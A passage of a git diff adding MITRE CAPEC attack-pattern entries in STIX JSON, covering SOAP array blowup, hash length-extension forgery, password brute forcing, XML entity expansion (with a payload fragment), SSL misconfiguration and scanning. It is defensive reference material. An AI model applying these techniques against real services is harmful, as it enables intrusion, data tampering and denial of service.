elsewhere and ability to identify functionality that is running web controls in the local zone and to find an injection vector into that functionality" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--58ea2198-8121-4b51-9594-be0aafd35947.json b/capec/attack-pattern/attack-pattern--58ea2198-8121-4b51-9594-be0aafd35947.json new file mode 100644 index 0000000000..80dceac1c1 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--58ea2198-8121-4b51-9594-be0aafd35947.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--fe02d44e-e44e-4936-8386-8b7450a52bee", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--58ea2198-8121-4b51-9594-be0aafd35947", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "SOAP Array Blowup", + "description": "An adversary may execute an attack on a web service that uses SOAP messages in communication. By sending a very large SOAP array declaration to the web service, the attacker forces the web service to allocate space for the array elements before they are parsed by the XML parser. The attacker message is typically small in size containing a large array declaration of say 1,000,000 elements and a couple of array elements. This attack targets exhaustion of the memory resources of the web service.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/493.html", + "external_id": "CAPEC-493" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html", + "external_id": "CWE-770" + }, + { + "source_name": "reference_from_CAPEC", + "description": "SOAP Array Attack", + "url": "http://www.ws-attacks.org/index.php/Soap_Array_Attack", + "external_id": "REF-422" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "This type of an attack requires the attacker to know the endpoint of the web service, and be able to reach the endpoint with a malicious SOAP message." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--59634590-4269-4742-896f-27e5a8f3acc4.json b/capec/attack-pattern/attack-pattern--59634590-4269-4742-896f-27e5a8f3acc4.json new file mode 100644 index 0000000000..933a339301 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--59634590-4269-4742-896f-27e5a8f3acc4.json @@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--72ed2806-4ade-4ebe-b564-dfd21ed11b65", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--59634590-4269-4742-896f-27e5a8f3acc4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "name": "Restful Privilege Elevation", + "description": "Rest uses standard HTTP (Get, Put, Delete) style permissions methods, but these are not necessarily correlated generally with back end programs. Strict interpretation of HTTP get methods means that these HTTP Get services should not be used to delete information on the server, but there is no access control mechanism to back up this logic. This means that unless the services are properly ACL'd and the application's service implementation are following these guidelines then an HTTP request can easily execute a delete or update on the server side. The attacker identifies a HTTP Get URL such as http://victimsite/updateOrder, which calls out to a program to update orders on a database or other resource. The URL is not idempotent so the request can be submitted multiple times by the attacker, additionally, the attacker may be able to exploit the URL published as a Get method that actually performs updates (instead of merely retrieving data). This may result in malicious or inadvertent altering of data on the server.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/58.html", + "external_id": "CAPEC-58" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html", + "external_id": "CWE-267" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/269.html", + "external_id": "CWE-269" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/264.html", + "external_id": "CWE-264" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Mark O'Neill, Security for REST Web Services, Vprde;", + "url": "http://www.vordel.com/downloads/rsa_conf_2006.pdf", + "external_id": "REF-463" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "The HTTP Get method is designed to retrieve resources and not to alter the state of the application or resources on the server side. However, developers can easily code programs that accept a HTTP Get request that do in fact create, update or delete data on the server. Both Flickr (http://www.flickr.com/services/api/flickr.photosets.delete.html) and del.icio.us (http://del.icio.us/api/posts/delete) have implemented delete operations using standard HTTP Get requests. These HTTP Get methods do delete data on the server side, despite being called from Get which is not supposed to alter state." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker needs to be able to identify HTTP Get URLs. The Get methods must be set to call applications that perform operations other than get such as update and delete." + ], + "x_capec_skills_required": { + "Low": "It is relatively straightforward to identify an HTTP Get method that changes state on the server side and executes against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--5aa9735e-f77e-463a-81b6-cc2d07b40c82.json b/capec/attack-pattern/attack-pattern--5aa9735e-f77e-463a-81b6-cc2d07b40c82.json new file mode 100644 index 0000000000..a05d37966e --- /dev/null +++ b/capec/attack-pattern/attack-pattern--5aa9735e-f77e-463a-81b6-cc2d07b40c82.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--d67d244a-f534-49d8-b658-b63f9e509c44", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--5aa9735e-f77e-463a-81b6-cc2d07b40c82", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Web Services API Signature Forgery Leveraging Hash Function Extension Weakness", + "description": "When web services require callees to authenticate, they sometimes issue a token / secret to the caller that the caller is to use to sign their web service calls. In one such scheme the caller when constructing a request would concatenate all of the parameters passed to the web service with the provided authentication token and then generate a hash of the concatenated string (e.g., MD5, SHA1, etc.). That hash then forms the signature that is passed to the web service which is used on the server side to verify the origin authenticity and integrity of the message. There is a practical attack against an authentication scheme of this nature that makes use of the hash function extension / padding weakness. Leveraging this weakness, an attacker, who does not know the secret token, is able to modify the parameters passed to the web service by generating their own call and still generate a legitimate signature hash. For instance, consider the message to be passed to the web service is M (this message includes the parameters passed to the web service concatenated with the secret token / key bytes). The message M is hashed and that hash is passed to the web service and is used for authentication. The attacker does not know M, but can see Hash (M) and Length (M). The attacker can then compute Hash (M || Padding (M) || M') for any M'. The attacker does not know the entire message M, specifically the attacker does not know the secret bytes, but that does not matter. The attacker is still able to sign their own message M' and make the called web service verify the integrity of the message without an error. Because of the iterative design of the hash function, it is possible, from only the hash of a message and its length, to compute the hash of longer messages that start with the initial message and include the padding required for the initial message to reach a multiple of 512 bits. It is important to note that the attack not limited to MD5 and will work just as well with another hash function like SHA1.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/461.html", + "external_id": "CAPEC-461" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/328.html", + "external_id": "CWE-328" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html", + "external_id": "CWE-290" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Thai Duong, Juliano Rizzo, Flickr's API Signature Forgery Vulnerability, 2009--09---28", + "url": "http://netifera.com/research/flickr_api_signature_forgery.pdf", + "external_id": "REF-398" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "Web services check the signature of the API calls", + "Authentication tokens / secrets are shared between the server and the legitimate client", + "The API call signature is generated by concatenating the parameter list with the shared secret and hashing the result.", + "An iterative hash function like MD5 and SHA1 is used.", + "An attacker is able to intercept or in some other way gain access to the information passed between the legitimate client and the server in order to retrieve the hash value and length of the original message.", + "The communication channel between the client and the server is not secured via channel security such as TLS" + ], + "x_capec_resources_required": [ + "\n Access to a function to produce a hash (e.g., MD5, SHA1)\n Tools that allow the attacker to intercept a message between the client and the server, specifically the hash that is the signature and the length of the original message concatenated with the secret bytes\n " + ], + "x_capec_skills_required": { + "Medium": "Medium level of cryptography knowledge, specifically how iterative hash functions work. This is needed to select proper padding." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--5abb3ee9-40b8-421d-8a13-adce13e62d3c.json b/capec/attack-pattern/attack-pattern--5abb3ee9-40b8-421d-8a13-adce13e62d3c.json new file mode 100644 index 0000000000..3c14b5f49e --- /dev/null +++ b/capec/attack-pattern/attack-pattern--5abb3ee9-40b8-421d-8a13-adce13e62d3c.json @@ -0,0 +1,82 @@ +{ + "type": "bundle", + "id": "bundle--891d487c-10e4-44ae-85a1-7cca9bfc2daa", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--5abb3ee9-40b8-421d-8a13-adce13e62d3c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Password Brute Forcing", + "description": "In this attack, the adversary tries every possible value for a password until they succeed. A brute force attack, if feasible computationally, will always be successful because it will essentially go through all possible passwords given the alphabet used (lower case letters, upper case letters, numbers, symbols, etc.) and the maximum length of the password. A system will be particularly vulnerable to this type of an attack if it does not have a proper enforcement mechanism in place to ensure that passwords selected by users are strong passwords that comply with an adequate password policy. In practice a pure brute force attack on passwords is rarely used, unless the password is suspected to be weak. Other password cracking methods exist that are far more effective (e.g. dictionary attacks, rainbow tables, etc.). Knowing the password policy on the system can make a brute force attack more efficient. For instance, if the policy states that all passwords must be of a certain level, there is no need to check smaller candidates.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/49.html", + "external_id": "CAPEC-49" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html", + "external_id": "CWE-521" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html", + "external_id": "CWE-262" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html", + "external_id": "CWE-263" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/257.html", + "external_id": "CWE-257" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html", + "external_id": "CWE-693" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "\n A system does not enforce a strong password policy and the user picks a five letter password consisting of lower case English letters only. The system does not implement any password throttling mechanism. Assuming the adversary does not know the length of the users' password, an adversary can brute force this password in maximum 1+26+26^2+26^3+26^4+26^5 = 1 + 26 + 676 + 17576 + 456976 + 11,881,376 = 12,356,631 attempts, and half these tries (6,178,316) on average. Using modern hardware this attack is trivial. If the adversary were to assume that the user password could also contain upper case letters (and it was case sensitive) and/or numbers, than the number of trials would have been larger.\n An adversary's job would have most likely been even easier because many users who choose easy to brute force passwords like this are also likely to use a word that can be found in the dictionary. Since there are far fewer valid English words containing up to five letters than 12,356,631, an attack that tries each of the entries in the English dictionary would go even faster.\n ", + "A weakness exists in the automatic password generation routine of Mailman prior to 2.1.5 that causes only about five million different passwords to be generated. This makes it easy to brute force the password for all users who decided to let Mailman automatically generate their passwords for them. Users who chose their own passwords during the sign up process would not have been affected (assuming that they chose strong passwords). See also: CVE-2004-1143" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An adversary needs to know a username to target.", + "The system uses password based authentication as the one factor authentication mechanism.", + "An application does not have a password throttling mechanism in place. A good password throttling mechanism will make it almost impossible computationally to brute force a password as it may either lock out the user after a certain number of incorrect attempts or introduce time out periods. Both of these would make a brute force attack impractical." + ], + "x_capec_resources_required": [ + "A powerful enough computer for the job with sufficient CPU, RAM and HD. Exact requirements will depend on the size of the brute force job and the time requirement for completion. Some brute forcing jobs may require grid or distributed computing (e.g. DES Challenge)." + ], + "x_capec_skills_required": { + "Low": "A brute force attack is very straightforward. A variety of password cracking tools are widely available." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--5acb26f6-90bc-47de-aca8-5493b5824204.json b/capec/attack-pattern/attack-pattern--5acb26f6-90bc-47de-aca8-5493b5824204.json new file mode 100644 index 0000000000..0c0469428c --- /dev/null +++ b/capec/attack-pattern/attack-pattern--5acb26f6-90bc-47de-aca8-5493b5824204.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--525cf4b5-0b1a-4666-931e-3c53d78dfb12", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--5acb26f6-90bc-47de-aca8-5493b5824204", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "XML Quadratic Expansion", + "description": "An adversary exploits a few properties of XML(substitution entities and inline DTDs) to cause a denial of service situation due to excessive memory being allocated to fully expand the XML. The result of this denial of service could cause the application to freeze or crash.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/491.html", + "external_id": "CAPEC-491" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html", + "external_id": "CWE-770" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "\n In this example the attacker defines one large entity and refers to it many times.\n \n ... [100K of them] ...\n \n AAAA\">]>&x;&x;\n ... [100K of them]...\n \n &x;&x;\n \n This results in a relatively small message of 100KBs that will expand to a message in the GB range.\n " + ], + "x_capec_prerequisites": [ + "This type of attack requires a server that accepts XML data and parses the data." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--5ad16d8c-e126-4a03-8931-e1f29523e1ee.json b/capec/attack-pattern/attack-pattern--5ad16d8c-e126-4a03-8931-e1f29523e1ee.json new file mode 100644 index 0000000000..014d83f0e4 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--5ad16d8c-e126-4a03-8931-e1f29523e1ee.json @@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--67fe9654-3baa-4f79-916a-ce657d0e7a66", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--5ad16d8c-e126-4a03-8931-e1f29523e1ee", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "name": "Exploiting Incorrectly Configured SSL", + "description": "An adversary takes advantage of incorrectly configured SSL communications that enables access to data intended to be encrypted. The adversary may also use this type of attack to inject commands or other traffic into the encrypted stream to cause compromise of either the client or server.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/217.html", + "external_id": "CAPEC-217" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html", + "external_id": "CWE-201" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "Using MITM techniques, an attacker launches a blockwise chosen-boundary attack to obtain plaintext HTTP headers by taking advantage of an SSL session using an encryption protocol in CBC mode with chained initialization vectors (IV). This allows the attacker to recover session IDs, authentication cookies, and possibly other valuable data that can be used for further exploitation. Additionally this could allow for the insertion of data into the stream, allowing for additional attacks (CSRF, SQL inject, etc) to occur." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Access to the client/server stream." + ], + "x_capec_resources_required": [ + "The attacker needs the ability to sniff traffic, and optionally be able to route said traffic to a system where the sniffing of traffic can take place, and act upon the recovered traffic in real time." + ], + "x_capec_skills_required": { + "High": "The attacker needs real-time access to network traffic in such a manner that the attacker can grab needed information from the SSL stream, possibly influence the decided-upon encryption method and options, and perform automated analysis to decipher encrypted material recovered. Tools exist to automate part of the tasks, but to successfully use these tools in an attack scenario requires detailed understanding of the underlying principles." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--5ba0f3bc-bb81-4f9f-a848-de3d6ab1b085.json b/capec/attack-pattern/attack-pattern--5ba0f3bc-bb81-4f9f-a848-de3d6ab1b085.json new file mode 100644 index 0000000000..8a94dfdbce --- /dev/null +++ b/capec/attack-pattern/attack-pattern--5ba0f3bc-bb81-4f9f-a848-de3d6ab1b085.json @@ -0,0 +1,78 @@ +{ + "type": "bundle", + "id": "bundle--9812c421-d835-4414-b49f-f14d9cf08011", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--5ba0f3bc-bb81-4f9f-a848-de3d6ab1b085", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "UDP Scan", + "description": "An adversary engages in UDP scanning to gather information about UDP port status on the target system. UDP scanning methods involve sending a UDP datagram to the target port and looking for evidence that the port is closed. Open UDP ports usually do not respond to UDP datagrams as there is no stateful mechanism within the protocol that requires building or establishing a session. Responses to UDP datagrams are therefore application specific and cannot be relied upon as a method of detecting an open port. UDP scanning relies heavily upon ICMP diagnostic messages in order to determine the status of a remote port. During a UDP scan, a datagram is sent to a target port. If an 'ICMP Type 3 Port unreachable' error message is returned then the port is considered closed. Different types of ICMP messages can indicate a filtered port. UDP scanning is slower than TCP scanning. The protocol characteristics of UDP make port scanning inherently more difficult than with TCP, as well as dependent upon ICMP for accurate scanning. Due to ambiguities that can arise between open ports and filtered ports, UDP scanning results often require a high degree of interpretation and further testing to refine. In general, UDP scanning results are less reliable or accurate than TCP-based scanning.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/308.html", + "external_id": "CAPEC-308" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "J. Postel, RFC768 - User Datagram Protocol, 1980--08---28", + "url": "http://www.faqs.org/rfcs/rfc768.html", + "external_id": "REF-158" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7", + "external_id": "REF-34" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "url": "http://phrack.org/issues/51/11.html", + "external_id": "REF-130" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_prerequisites": [ + "The ability to send UDP datagrams to a host and receive ICMP error messages from that host. In cases where particular types of ICMP messaging is disallowed, the reliability of UDP scanning drops off sharply." + ], + "x_capec_resources_required": [ + "The ability to craft custom UDP Packets for use during network reconnaissance. This can be accomplished via the use of a port scanner, or via socket manipulation in a programming or scripting language. Packet injection tools are also useful. It is also necessary to trap ICMP diagnostic messages during this process. Depending upon the method used it may be necessary to sniff the network in order to see the response." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--5d250b2b-1f3f-4a41-9cbf-7c91fb7e4c69.json b/capec/attack-pattern/attack-pattern--5d250b2b-1f3f-4a41-9cbf-7c91fb7e4c69.json new file mode 100644 index 0000000000..b35cd0bbb0 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--5d250b2b-1f3f-4a41-9cbf-7c91fb7e4c69.json @@ -0,0 +1,101 @@ +{ + "type": "bundle", + "id": "bundle--d3d95585-ecb3-4dff-b71e-ecf13bf7d14f", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--5d250b2b-1f3f-4a41-9cbf-7c91fb7e4c69", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "AJAX Fingerprinting", + "description": "This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. In many XSS attacks the attacker must get a \"hole in one\" and successfully exploit the vulnerability on the victim side the first time, once the client is redirected the attacker has many chances to engage in follow on probes, but there is only one first chance. In a widely used web application this is not a major problem because 1 in a 1,000 is good enough in a widely used application. A common first step for an attacker is to footprint the environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/85.html", + "external_id": "CAPEC-85" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html", + "external_id": "CWE-79" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/113.html", + "external_id": "CWE-113" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html", + "external_id": "CWE-348" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html", + "external_id": "CWE-96" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html", + "external_id": "CWE-116" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html", + "external_id": "CWE-184" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/86.html", + "external_id": "CWE-86" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/712.html", + "external_id": "CWE-712" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html", + "external_id": "CWE-692" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Shreeraj Shah, Ajax fingerprinting for Web 2.0 Applications, Help Net Security", + "url": "https://www.helpnetsecurity.com/dl/articles/Ajax_fingerprinting.pdf", + "external_id": "REF-539" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_example_instances": [ + "Footprinting can be executed over almost any protocol including HTTP, TCP, UDP, and ICMP, with the general goal of gaining further information about a host environment to launch further attacks. By appending a malicious script to an otherwise normal looking URL, the attacker can probe the system for banners, vulnerabilities, filenames, available services, and in short anything the host process has access to. The results of the probe are either used to execute additional javascript (for example, if the attackers' footprint script identifies a vulnerability in a firewall permission, then the client side script executes a javascript to change client firewall settings, or an attacker may simply echo the results of the scan back out to a remote host for targeting future attacks)." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The user must allow JavaScript to execute in their browser" + ], + "x_capec_skills_required": { + "Medium": "To land and launch a script on victim's machine with appropriate footprinting logic for enumerating services and vulnerabilities in JavaScript" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--5dae155c-ad21-4b0c-9d2c-bcd604c0ad6b.json b/capec/attack-pattern/attack-pattern--5dae155c-ad21-4b0c-9d2c-bcd604c0ad6b.json new file mode 100644 index 0000000000..1dd289ca4a --- /dev/null +++ b/capec/attack-pattern/attack-pattern--5dae155c-ad21-4b0c-9d2c-bcd604c0ad6b.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--7efe0ffb-803e-4f4d-8fdb-5eb8dbfc9aa8", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--5dae155c-ad21-4b0c-9d2c-bcd604c0ad6b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Signature Spoofing by Improper Validation", + "description": "An attacker exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/475.html", + "external_id": "CAPEC-475" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html", + "external_id": "CWE-327" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Recipient is using a weak cryptographic signature verification algorithm or a weak implementation of a cryptographic signature verification algorithm, or the configuration of the recipient's application accepts the use of keys generated using cryptographically weak signature verification algorithms." + ], + "x_capec_skills_required": { + "High": "Reverse engineering and cryptanalysis of signature verification algorithm implementation" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--5ece46f5-57a2-4d0b-b53c-e4a214528a01.json b/capec/attack-pattern/attack-pattern--5ece46f5-57a2-4d0b-b53c-e4a214528a01.json new file mode 100644 index 0000000000..7ff8102d76 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--5ece46f5-57a2-4d0b-b53c-e4a214528a01.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--6e226d6c-0e01-4ca7-b4f8-9b8406fc3cd7", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--5ece46f5-57a2-4d0b-b53c-e4a214528a01", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Content Spoofing Via Application API Manipulation", + "description": "An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, spam-like content, or links to the attackers' code. In general, content-spoofing within an application API can be employed to stage many different types of attacks varied based on the attackers' intent. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/389.html", + "external_id": "CAPEC-389" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html", + "external_id": "CWE-353" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--5eea64eb-4ae7-4b82-8b47-fdf143767059.json b/capec/attack-pattern/attack-pattern--5eea64eb-4ae7-4b82-8b47-fdf143767059.json new file mode 100644 index 0000000000..4923807734 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--5eea64eb-4ae7-4b82-8b47-fdf143767059.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--73d88378-e5c4-41ee-9e30-acf4585d59dc", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--5eea64eb-4ae7-4b82-8b47-fdf143767059", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": 